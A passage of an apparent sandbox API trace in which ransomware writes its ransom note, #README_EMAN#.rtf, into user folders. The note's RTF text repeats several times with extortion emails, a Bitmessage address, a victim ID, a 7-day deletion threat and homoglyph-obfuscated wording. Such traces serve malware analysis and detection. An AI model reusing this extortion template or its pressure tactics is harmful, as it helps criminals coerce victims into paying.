m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.847] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.848] CloseHandle (hObject=0x2c8) returned 1 [0278.848] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\#readme_eman#.rtf")) returned 0xffffffff [0278.848] GetLastError () returned 0x2 [0278.848] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 